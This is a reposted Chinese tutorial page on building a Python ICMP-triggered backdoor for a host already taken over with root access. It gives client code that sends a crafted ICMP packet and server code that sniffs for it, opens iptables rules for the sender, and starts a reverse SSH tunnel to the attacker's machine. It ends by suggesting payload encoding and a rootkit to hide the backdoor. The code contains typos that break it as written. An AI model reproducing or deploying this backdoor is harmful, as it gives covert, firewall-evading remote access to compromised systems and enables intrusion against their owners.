python cs开发框架_用Python编写一个简单的CS架构后门的方法
用Python编写一个简单的CS架构后门的方法
来源:中文源码网 浏览: 次 日期:2019年11月5日
【下载文档: 用Python编写一个简单的CS架构后门的方法.txt 】
(友情提示:右键点上行txt文档名->目标另存为)
用Python编写一个简单的CS架构后门的方法0x00:事先说明 你已经攻陷了对方主机且获得了最高权限。
对方的本地防火墙会丢弃所有的外来数据包。
这个后门不会仅绑定在某一个端口上。
这段代码很容易写,毕竟是 Python(准确说是 Python 2.x)。0x01:工作原理如你所见,客户端将伪造具有 ICMP 负载的特定数据包,另一方面在服务端,也就是我们的被攻击主机,将会接受我们发送的数据包,即使它开启了本地的防火墙(丢弃所有外来数据包)。关键在于无线网卡的监听模式,它无需和 AP 建立连接却可以和接受所有流经空气的数据包。
我们会用到一个有用的第三方包 Scapy。这是它的官方文档。如果你是第一次使用,不妨参考这篇文章,也许会有帮助。
0x02:客户端代码
'''
客户端代码。将服务端的 IP 地址、客户端的 IP 地址、客户端的连接端口,以及连接所需密码作为程序输入。如果成功返回一个交互式后门,在代码硬编码好的位置写入日志文件信息。
'''
#! /usr/bin/env python
import logging
import socket
from scapy.all import *
import os
import os.path
import sys
import time
logging.getLongger("scapy.runtime").setLevel(loggin.ERROR)
file_result = "/tmp/done"
if len(sys.argv) != 5:
print "usage : " + " IP_SERVER " + " CLIENT_IP " + " PORT_SSH_CLIENT " + “ PASSWORD_CLIENT ”
sys.exit(1)
server = sys.argv[1]
if os.path.isfile(file_result):
os.remove(file_result)
load = sys.argv[2] + "|" + sys.argv[3] + "|" + sys.argv[4]
pingr = IP(dst = server) / ICMP() / load
send(pingr, verbose = 0) # send() 函数工作在协议栈的第三层(网络层)0x04:服务端代码
服务端代码分为两块:1. 主要脚本部分、2. ssh 隧道部分。
'''
服务端代码之主要脚本部分。这个脚本会监听 ICMP 数据包并从句法上分析其携带的数据部分(客户端 IP 地址、客户端连接端口、连接所需密码)。接着在本地打开两个新的防火墙规则。最后调用另一个 expect 脚本,以建立和客户端之间稳定的 ssh 连接。
'''
#! /usr/bin/env python
import logging
import socket
from scapy.all import *
import re
import subprocess # py2.4 新增模块,允许用户编写代码生成新进程,连接到它们的 input/output/error 管道,并获取它们的返回/状态码。
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
def icmp_monitor_callback(pkt):
reg = re.compile("(.*)\|(.*)\|(.*)")
g = reg.match(pkt.load)
if g:
subprocess.Popen(["/sbin/iptables", "-I", "INPUT", "1","-s",g.group(1),'-j','ACCEPT'])
subprocess.Popen(["/sbin/iptables", "-I", "OUTPUT", "1","-d",g.group(1),'-j','ACCEPT'])
p=subprocess.call(["/root/sshtunnel.sh", g.group(1),g.group(2),g.group(3)])
return
sniff(prn=icmp_monitor_callback, filter="icmp", store=0) # scapy.sniff() 函数会嗅探来自空气中的数据包,prn 参数用来指定回调函数,每当符合 filter 的报文被探测到时,就会执行回调函数。有关该函数的详细信息,可以参考这篇博客:http://thepacketgeek.com/scapy-sniffing-with-custom-actions-part-1/'''
服务端代码之 ssh 隧道部分,实际上是一个简单的 expect 脚本。接受嗅探到的客户端 IP 地址、客户端端口,以及用于连接的密码作为输入。
'''
#!/usr/bin/expect -f
set ip [lindex $argv 0];
set port [lindex $argv 1];
set password [lindex $argv 2];
spawn ssh -o StrictHostKeyChecking=no -R 19999:localhost:$port $ip
expect "*?assword:*"
send "$password\r"
expect "*#"
send "touch /tmp/done\r"
interact0x05:文末思考
上面完成的后门代码待完善的地方。 ICMP payload 应该被编码。
添加其他的协议用来唤醒该后门(如 http、特定的 syn 包、dns 等)。
写一个 rootkit,隐藏该后门,猥琐欲为。此乃后话。有关 rootkit 的延伸阅读。 http://www.zwyuanma.com/article/151111.htm
http://null-byte.wonderhowto.com/how-to/writing-windows-10-rootkit-part-1-0165781/总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对中文源码网的支持。如果你想了解更多相关内容请查看下面相关链接
亲,试试微信扫码分享本页! *^_^*
python cs开发框架_用Python编写一个简单的CS架构后门的方法相关推荐
- java编写存钱_用Java编写一个简单的存款
package desposit.money; public class DespositMoney { public static void main(String[] args) { Custom ...
- python cs开发框架_我的第一个python web开发框架(24)——系统重构与ORM
小白弄完代码版本管理和接口文档后,兴奋的找到老菜. 小白:老大,我已经按你讲的要求,将代码版本管理和接口文档都搞好了.从项目开始到现在,除了代码编写,感觉学会好多东西啊. 老菜:嗯嗯,实战确实需要掌握 ...
- python游戏开发框架_用Python和Pygame写游戏-从入门到精通(实战二:恶搞俄罗斯方块1)...
游戏是为了什么而存在的?Bingo,是为了娱乐~ 在这个最高主题之前,技术啥的什么都无所谓! 前一段时间,有位姓刘的网友用Pygame写了个俄罗斯方块,在用py2exe打包的时候遇到一些问题,和我交流 ...
- python七彩同心圆_用pygame做一个简单的python小游戏---七彩同心圆
用pygame做一个简单的python小游戏---七彩同心圆 用pygame做一个简单的python小游戏-七彩同心圆 这个小游戏原是我同学python课的课后作业,并不是很难,就简单实现了一下,顺便 ...
- 使用python的random()随机函数编写一个简单的双色球项目
python中的random()函数常见函数如下: import randomprint( random.randint(1,10) ) # 产生 1 到 10 的一个整数型随机数 print( ra ...
- matlab z变换离散化_用C++编写一个简单的光栅化渲染器:3D篇
3D光栅化与2D光栅化在图元绘制方面差别并不大,3D光栅化主要是多了很多坐标系(Local,world,View...),除此外遮挡算法和裁剪算法也会稍微复杂一些. 本篇文章的重点就主要集中在各种坐标 ...
- java 银行存取款_使用JAVA编写一个简单的银行存取款程序
package com.lw.thread; /* 银行账户类Account(不能透支), 包含账号id(10~16位数字),密码password(6位数字),户主姓名name,余额balence * ...
- java体重指数计算器程序_用Java编写一个简单的计算器程序
展开全部 import java.awt.*; import java.awt.event.*; public class CalcAppDemo extends Frame{ private Tex ...
- java获取密码框密码_用JAVA编写一个简单密码框
只是简单的写出一个界面来,没有添加事件响应. import java.awt.*; public class Main { public static void main(String[] args) ...
最新文章
- mysql二进制日志管理_MYSQL二进制日志管理脚本
- python 在windows 中文显示
- C++计算nCr模p表达式如n! / (r! * (n-r)!)的实现算法(附完整源码)
- java决策树算法_「Smile」一下,轻松用Java玩转机器学习
- 关于ssm框架的全部整合(一) 2021.05.09
- 第2章[2.4] Ext JS的类与类体系
- RSTP比STP快在哪?
- 深圳地图echarts
- c/c++成长之捷径 C/C++学习资料大全
- python杂志订阅系统详细设计_图书管理系统详细设计说明书(完整).doc
- innerHTML和outerHTML区别
- java protected 构造方法_Java中protected语义解释
- Vue 3 模板语法
- 【二级等保】二级等保安全物理环境要求有哪些?
- 跨越6XX和4XX排名纪实
- 因为不允许对公司代码 XXXX科目 XXXXXXXXXX进行销项/进项税相关操作,所以税码XX无效
- 可刷新的 PDB(PDB Refresh)
- mysql组合索引,abc索引命中
- IPSEC 的IKE协商过程,主模式和野蛮模式,AH和ESP
- 【栈】 括 号 匹 配 (LeetCode)